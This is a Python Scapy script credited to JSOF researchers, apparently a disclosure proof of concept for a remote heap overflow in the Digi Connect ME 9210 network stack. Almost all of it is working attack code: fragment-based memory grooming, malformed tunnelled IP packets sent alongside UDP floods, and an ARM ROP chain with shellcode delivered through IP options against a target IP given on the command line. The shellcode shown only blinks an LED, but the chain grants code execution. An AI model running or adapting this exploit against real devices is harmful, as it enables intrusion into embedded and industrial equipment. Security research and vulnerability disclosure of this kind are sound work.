# Copyright (c) 2020 JSOF Ltd.
# Available under MIT License
#
# Authors: Moshe Kol, Shlomi Oberman

from scapy.all import *
import argparse
import threading
import struct

VERBOSE_LEVEL = 0

MALFORMED_THREAD_FLAG = False
BENIGN_THREAD_FLAG = False

FRAG_TTL = 4

def vprint(*args, **kwargs):
    if VERBOSE_LEVEL > 0:
        print(*args, **kwargs)

def log_status(*args, **kwargs):
    vprint("[x]", *args, **kwargs)

def log_success(*args, **kwargs):
    vprint("[+]", *args, **kwargs)

def log_failure(*args, **kwargs):
    vprint("[-]", *args, **kwargs)

def log_info(*args, **kwargs):
    vprint("[*]", *args, **kwargs)

def log_warning(*args, **kwargs):
    vprint("[!]", *args, **kwargs)

def log_debug(*args, **kwargs):
    vprint("[DEBUG]", *args, **kwargs)

def p32(b):
    return struct.pack(">I", b) # big-endian

# desired allocation size -> payload size
PAYLOAD_SIZES = {
    0x100: 4,
    0x200: 120,
    0x400: 400,
}

class Attack:
    def __init__(self, iface, ip_dst, udp_dport, udp_sport):
        self.iface = iface
        self.ip_dst = ip_dst
        self.udp_dport = udp_dport
        self.udp_sport = udp_sport

        self.sock = conf.L3socket(iface=iface)

    def send_benign_udp(self, payload_size, count):
        global BENIGN_THREAD_FLAG

        pkt = IP(dst=self.ip_dst)
        pkt /= UDP(sport=self.udp_sport, dport=self.udp_dport)
        pkt /= (b'X'*payload_size)

        it_num = 0
        while count < 0 or it_num < count:
            self.sock.send(pkt)

            it_num += 1

            if BENIGN_THREAD_FLAG:
                break
    
    def send_benign_udp_ex(self, payload_size, count, timeout, thread_count=4):
        global BENIGN_THREAD_FLAG
        if count >= 0:
            assert count >= 2*thread_count
        else:
            assert timeout > 0
        log_status("Sending {} benign udp packets with payload size {}".format(count if count >= 0 else "infinite", payload_size))
        
        bthreads = []
        for _ in range(thread_count):
            t = threading.Thread(target=Attack.send_benign_udp,
                                args=(self, payload_size, count//thread_count))
            bthreads.append(t)
            t.start()
        
        if timeout > 0:
            time.sleep(timeout)
            BENIGN_THREAD_FLAG = True
        
        for t in bthreads:
            t.join()
    
    def send_malformed(self, payload, count, delay=0):
        global MALFORMED_THREAD_FLAG
        assert len(payload) >= 12

        iplen = 32
        encap_packet = IP(dst=self.ip_dst, len=iplen)
        encap_packet /= UDP(sport=self.udp_sport, dport=self.udp_dport, chksum=0, len=iplen-20)
        encap_packet /= payload
        
        frag1_data_len = 40
        frag1 = IP(dst=self.ip_dst, frag=0, flags=1, proto=4, id=0)
        frag1 /= bytes(encap_packet)[:frag1_data_len]

        frag2 = IP(dst=self.ip_dst, frag=(frag1_data_len>>3), flags=0, proto=4, id=0)
        frag2 /= bytes(encap_packet)[frag1_data_len:]

        ip_id = int(RandShort())
        it_num = 0
        while count < 0 or it_num < count:
            frag1[IP].id = ip_id
            frag2[IP].id = ip_id

            self.sock.send(frag1)
            self.sock.send(frag2)

            it_num += 1
            ip_id = (ip_id + 1) % 0x10000

            if delay > 0:
                time.sleep(delay)
            if MALFORMED_THREAD_FLAG:
                break

    def send_malformed_ex(self, payload, count, delay, timeout, thread_count=1):
        global MALFORMED_THREAD_FLAG
        if count < 0:
            assert timeout > 0
        log_status("Sending {} malformed packet with payload size {}".format(count if count >= 0 else "infinite", len(payload)))

        mthreads = []
        for _ in range(thread_count):
            t = threading.Thread(target=Attack.send_malformed,
                                args=(self, payload, count, delay))
            mthreads.append(t)
            t.start()
        
        if timeout > 0:
            time.sleep(timeout)
            MALFORMED_THREAD_FLAG = True

        for t in mthreads:
            t.join()

    def overflow(self, payload, malformed_delay, malformed_count=-1, malformed_thread_count=1, benign_count=-1, benign_thread_count=1, timeout=5, allocation_size=0x100):
        log_info("Timeout: {}".format(timeout))
        bthread = threading.Thread(target=Attack.send_benign_udp_ex,
                                    args=(self, PAYLOAD_SIZES[allocation_size << 1], benign_count, timeout, benign_thread_count))
        bthread.start()

        mthread = threading.Thread(target=Attack.send_malformed_ex,
                                    args=(self, payload, malformed_count, malformed_delay, timeout, malformed_thread_count))
        mthread.start()

        bthread.join()
        mthread.join()

    def stage_1(self, icmp_count=32):
        log_status("===== Stage 1 =====")
        log_status("Sending {} ICMP echo request packets...".format(icmp_count))
        echo_request = IP(dst=self.ip_dst)/ICMP()

        for _ in range(icmp_count):
            self.sock.send(echo_request)
        
        log_success("Finish ICMP echo request")

        log_status("Sending 5 half-open fragments...")
        half_frag_echo_request = IP(dst=self.ip_dst, flags=1)/ICMP()
        for ip_id in range(1,6):
            half_frag_echo_request[IP].id = ip_id
            self.sock.send(half_frag_echo_request)
        log_status("Waiting for fragment reassembly time exceeded...")
        time.sleep(FRAG_TTL + 1)

        log_status("Sending 2 half-open fragments...")
        for ip_id in range(6,8):
            half_frag_echo_request[IP].id = ip_id
            self.sock.send(half_frag_echo_request)
        log_status("Waiting for fragment reassembly time exceeded...")
        time.sleep(FRAG_TTL + 1)
    
    def stage_2(self, address):
        log_status("===== Stage 2 =====")
        # The rop chain need to be written in the given address
        # therefore we need to adjust the address
        address = address - 0xa0
        payload = b'A'*92 + p32(0x111) + p32(0x108) + p32(0x100) + p32(address)
        self.overflow(payload,
                      malformed_delay=0.001,
                      malformed_count=-1,
                      malformed_thread_count=1,
                      benign_count=-1,
                      benign_thread_count=1,
                      timeout=5)

    def stage_3(self, rop):
        assert len(rop) % 4 == 0
        log_status("===== Stage 3 =====")
        time.sleep(1)
        log_status("Sending half-open IP packet fragments to generate ICMP error and drop ROP chain")
        pkt = IP(ihl=0xf, dst=self.ip_dst, flags=1, proto=1, options=[b'\x00\x00\x00\x00' + rop[:36]])
        pkt /= rop[36:]
        for ip_id in range(0x8000, 0x8000+3):
            pkt[IP].id = ip_id
            self.sock.send(pkt)

    def attack(self, stage=0):
        log_status("Attacking Digi Connect ME 9210...")

        # Led 2 blinks indefinitely
        # shellcode size: 0x54
        shellcode = b'\xe5\x9f\x80\x44\xe5\x9f\x90\x44\xe3\xa0\x00\x00\xe3\xa0\x10\x01'
        shellcode += b'\xe3\xa0\x20\x00\xe1\xa0\xe0\x0f\xe1\x2f\xff\x18\xe3\xa0\x00\x64'
        shellcode += b'\xe1\xa0\xe0\x0f\xe1\x2f\xff\x19\xe3\xa0\x00\x00\xe3\xa0\x10\x01'
        shellcode += b'\xe3\xa0\x20\x01\xe1\xa0\xe0\x0f\xe1\x2f\xff\x18\xe3\xa0\x00\x64'
        shellcode += b'\xe1\xa0\xe0\x0f\xe1\x2f\xff\x19\xea\xff\xff\xee\x00\x02\x83\x94'
        shellcode += b'\x00\x06\x28\x5c'

        stack_address_to_overwrite = 0x1a5330

        gadget1 = 0x0002f95c # 0x0002f95c: mov r2, r5; mov lr, pc; bx r7; 
        gadget2 = 0x0002f954 # 0x0002f954: mov r0, r4; mov r1, r6; mov r2, r5; mov lr, pc; bx r7; 
        gadget3 = 0x00034ec8 # 00034ec8 e1 2f ff 18     bx         r8
        gadget4 = 0x0000681c # 0000681c e8 bd 8f f1     ldmia      sp!,{r0 r4 r5 r6 r7 r8 r9 r10 r11 pc }
        gadget5 = 0x000d1c84 # mov lr, pc; bx r3; mov r0, r4; pop {r4, pc}; 
        gadget6 = 0x000267e4 # pop {r0, r1, r2, r3, r4, r5, r6, r7, r8, sb, sl, fp, ip, lr}; mov pc, lr; 

        memcpy = 0x0000674c # memcpy address after push register
        tfTcpRestart2Msl = 0x0004a8ac
        ProcessorGpioSetOutputValue = 0x00028394
        tx_thread_sleep = 0x0006285c

        rop = bytearray()
        rop += p32(stack_address_to_overwrite + 44) # r0
        rop += p32(0) # r4
        rop += p32(0) # r5
        rop += p32(0) # r6
        rop += p32(memcpy) # r7
        rop += p32(0) # r8
        rop += p32(0) # r9
        rop += p32(0) # r10
        rop += p32(0) # r11
        rop += p32(gadget1) # pc

        rop += p32(0) # r0
        rop += p32(0) # r4
        rop += p32(0) # r5
        rop += p32(0) # r6
        rop += p32(0) # r7
        rop += p32(0) # r8
        rop += p32(0) # r9
        rop += p32(0) # r10
        rop += p32(0) # r11
        rop += p32(gadget6) # pc

        rop += p32(100) # r0
        rop += p32(0) # r1
        rop += p32(0) # r2
        rop += p32(tx_thread_sleep) # r3
        rop += p32(0) # r4
        rop += p32(0) # r5
        rop += p32(0) # r6
        rop += p32(0) # r7
        rop += p32(0) # r8
        rop += p32(0) # r9
        rop += p32(0) # r10
        rop += p32(0) # r11
        rop += p32(0) # r12
        rop += p32(gadget5) # lr

        rop += p32(0) # r4
        shellcode_address = stack_address_to_overwrite + len(rop) + 4
        rop += p32(shellcode_address) # pc

        rop += shellcode
        rop[8:12] = p32(len(rop) - 44)

        self.stage_1()
        self.stage_2(stack_address_to_overwrite)
        self.stage_3(bytes(rop))

if __name__ == '__main__':
    conf.verb = 0 # make scapy silent

    parser = argparse.ArgumentParser()
    parser.add_argument('ip_dst', help="destination IP address")
    parser.add_argument('udp_dport', type=int, default=2362, nargs='?',
                        help="destination UDP port (Default: 2362 (digiman))")
    parser.add_argument('udp_sport', type=int, default=7, nargs='?',
                        help="source UDP port (Default: 7)")
    parser.add_argument('-i', '--iface', default=None, nargs='?',
                        help="interface name as shown in scapy's show_interfaces() function")
    parser.add_argument('-og', '--override-gateway', dest='gw', default='use_ip_dst', const=None, type=str, nargs='?',
                        help='override gateway for ip_dst in scapy routing table (Default: override with ip_dst, use -og to disable overriding)')
    parser.add_argument('-v', '--verbose', default=0, action='count',
                        help="how much output you'd like")
    parser.add_argument('-s', '--stage', dest='stage', default=0, type=int, help='which stage to invoke (0 for all stages)')

    args = parser.parse_args()

    gw = None
    if args.gw:
        if args.gw == 'use_ip_dst':
            gw = args.ip_dst
        else:
            gw = args.gw
    if gw:
        conf.route.add(host=(args.ip_dst), gw=gw)

    iface = args.iface
    if iface is not None and iface.isdigit():
        iface = IFACES.dev_from_index(int(iface)).description

    VERBOSE_LEVEL = args.verbose

    attck = Attack(iface,
                args.ip_dst,
                args.udp_dport,
                args.udp_sport)
    attck.attack(stage=args.stage)
